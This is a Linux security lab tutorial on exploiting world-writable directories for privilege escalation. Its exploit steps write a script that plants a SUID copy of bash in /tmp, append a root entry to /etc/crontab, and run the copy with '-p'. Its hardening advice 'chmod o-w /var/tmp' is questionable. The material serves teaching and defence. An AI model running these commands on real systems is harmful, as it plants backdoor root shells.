Objective: Understand how attackers can exploit world-writable directories to escalate privileges by creating or modifying files, and learn how to secure directory permissions to prevent such attacks.
Scenario: You are tasked with assessing the security of a Linux system. During your investigation, you discover directories with world-writable permissions. These directories can be exploited to create or overwrite files, potentially leading to privilege escalation or unauthorized actions. Your objective is to identify and exploit these directories while implementing preventive measures to secure the system.
Lab Setup
- Environment:
- A Linux system with at least one directory configured with world-writable permissions.
- Tools Required:
- Terminal access to the Linux system.
- Basic scripting knowledge (e.g., Bash).
Lab Steps
Step 1: Identify World-Writable Directories
Search for directories with world-writable permissions using the find command:
find / -type d -perm -0002 2>/dev/null-type d: Restrict the search to directories.
-perm -0002: Find directories with the write permission bit set for others.
2>/dev/null: Suppress permission-denied errors.
Analyze the output to locate directories that could be exploited. Examples include:
/tmp
/var/tmp
Application-specific temporary directories.
Step 2: Exploit a Vulnerable Directory
Choose a world-writable directory from the list, such as /tmp.
Create a malicious script in the directory:
echo '#!/bin/bash' > /tmp/malicious.sh
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' >> /tmp/malicious.sh
chmod +x /tmp/malicious.shThis script creates a copy of /bin/bash with the SUID bit set, allowing it to run with root privileges.
Identify a process or cron job that executes files from the vulnerable directory:
Example: A cron job that runs scripts from /tmp.
Step 3: Trigger the Exploit
Modify the cron job or process to execute your malicious script.
echo '* * * * * root /tmp/malicious.sh' >> /etc/crontabWarning: This step assumes access to /etc/crontab for demonstration purposes. In real scenarios, look for legitimate cron jobs or processes already using the directory.
Wait for the script to execute (e.g., when the cron job runs).
Verify the result:
/tmp/rootbash -p
whoamiExpected output: root.
Step 4: Analyze the Exploit
- Document how the world-writable directory was exploited, including:
- Directory permissions.
- The malicious script.
- Steps leading to privilege escalation.
Solution
Explanation:
- World-writable directories allow any user to create or modify files. If these directories are used by privileged processes, attackers can introduce malicious files to execute arbitrary commands.
Prevention:
Audit and Restrict Permissions:
Identify and secure world-writable directories:
chmod o-w /path/to/directoryExample:
chmod o-w /var/tmpUse Secure Temporary Directories:
Configure applications to use private, user-specific temporary directories (e.g., mktemp).
Monitor for Unauthorized Changes:
Use tools like auditd to track changes to sensitive directories.
Principle of Least Privilege:
Limit user access to critical directories and processes.
Harden Cron Jobs and Processes:
Ensure that cron jobs and automated processes do not execute files from world-writable directories.
Testing and Verification
- Re-run the
findcommand to confirm no critical directories are world-writable. - Test the exploit after securing the directories to ensure it is no longer feasible.
- Document all findings and fixes for reporting.
Reflection
This exercise highlights the risks of misconfigured directory permissions and how they can be exploited for privilege escalation. By identifying and exploiting world-writable directories, you’ve gained hands-on experience in securing Linux systems against such vulnerabilities.
0 Comments